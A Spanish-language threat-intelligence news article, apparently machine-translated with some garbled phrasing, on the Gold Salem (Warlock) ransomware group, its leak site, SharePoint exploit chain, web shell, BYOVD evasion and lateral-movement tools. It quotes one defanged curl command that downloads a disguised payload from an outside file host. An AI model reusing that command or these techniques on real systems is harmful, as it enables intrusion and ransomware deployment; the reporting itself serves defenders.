El paisaje cibernético ha sido testigo de la aparición de otra operación sofisticada de ransomware como Gold Salem, un nuevo grupo de actores de amenaza también conocido como Warlock Group, ha estado comprometiendo activamente las redes empresariales desde marzo de 2025.
Este colectivo de ransomware emergente ha dirigido con éxito a 60 organizaciones en América del Norte, Europa y América del Sur, demostrando Tradecraft competente mientras implementa su carga útil de ransomware de brujo personalizado.
Microsoft ha rastreado a este grupo como Storm-2603 y sugiere con confianza moderada que opera desde China, aunque la atribución sigue siendo no concluyente.
Gold Salem se ha posicionado estratégicamente dentro del ecosistema competitivo de ransomware al dirigirse a una amplia gama de víctimas, desde pequeñas entidades comerciales hasta grandes corporaciones multinacionales.
El grupo opera a través de un sofisticado modelo de doble extorsión, utilizando un sitio de fuga de datos basado en TOR para publicar datos de víctimas robados cuando las demandas de rescate no se pagan.
Su selección de víctimas parece estratégica, evitando en gran medida objetivos en China y Rusia, aunque en particular enumeraron una compañía de servicios de generación de electricidad rusa en septiembre de 2025, lo que sugiere operaciones potenciales de los refugios de ransomware tradicionales.
Los actores de amenaza hicieron su debut público a través de foros subterráneos en junio de 2025, publicando en el foro de rampa para solicitar hazañas para aplicaciones empresariales, incluidos Veeam, ESXI y SharePoint, mientras buscan herramientas para deshabilitar los sistemas de detección y respuesta de puntos finales.
Analistas de Sophos identificado Las sofisticadas medidas de seguridad operativas del grupo y señalaron sus esfuerzos de reclutamiento para corredores de acceso inicial, lo que indica capacidades de intrusión directa o el desarrollo de un modelo de ransomware como servicio.
La infraestructura operativa de Gold Salem demuestra una planificación avanzada y sofisticación técnica.
El grupo mantiene temporizadores de cuenta regresiva para cada víctima, que generalmente permite 12-14 días para el pago de rescate antes de la publicación de datos.
A partir de septiembre de 2025, afirman haber vendido datos del 45% de sus víctimas a compradores privados, aunque estas cifras pueden estar infladas por impacto psicológico.
Sitio de fuga de Gold Salem al 16 de septiembre de 2025 (Fuente – Sophos)
El sitio de fuga de datos del grupo presenta una presentación profesional y categorización de víctimas, lo que refleja su compromiso con la profesionalidad operativa.
Técnicas de evasión avanzadas y métodos de derivación de seguridad
El análisis técnico revela el enfoque sofisticado de Gold Salem para la solución de la solución de seguridad y el acceso persistente a la red.
El grupo emplea la cadena de explotación de la costa de herramientas dirigida a los servidores de SharePoint para el compromiso de la red inicial, aprovechando una combinación de vulnerabilidades críticas, incluidos CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 y CVE-2025-53771.
Tras la explotación exitosa, implementan un shell web ASPX que crea objetos de proceso para CMD (.) Exe dentro del contexto del proceso del trabajador IIS, lo que permite la ejecución de comandos remotos con visibilidad de salida.
Una técnica particularmente notable observada implica su ejecución de comando a través del shell web:
CURL – L – OC: \\ USUARIOS \\ Public \\ Sophos \\ Sophos -ui (.) Exe hxxps (::) // filebin (.) net/j7jqfnh8tn4alzsr/wsocks (.) exe (.) txt
Este comando descarga un servidor WebSockets basado en Golang, estableciendo un acceso persistente independiente del shell web inicial.
El grupo demuestra capacidades de evasión avanzadas a través de las técnicas de Trae sus propios controladores vulnerables (BYOVD), utilizando un controlador antivirus de Baidu Vulnerable renombrado (Googleapiutil64.sys) para explotar CVE-2024-51324 para la terminación de procesos arbitrarios, específicamente que se dirigen a los agentes de EDR.
Su kit de herramientas incluye a Mimikatz para la extracción de credenciales de la memoria LSASS, PSEXEC y Impacket para el movimiento lateral y el abuso de objetos de políticas grupales para la implementación de ransomware en los puntos finales de la red.
¡Encuentra esta historia interesante! Séguenos Google News, LinkedIny incógnita Para obtener más actualizaciones instantáneas.
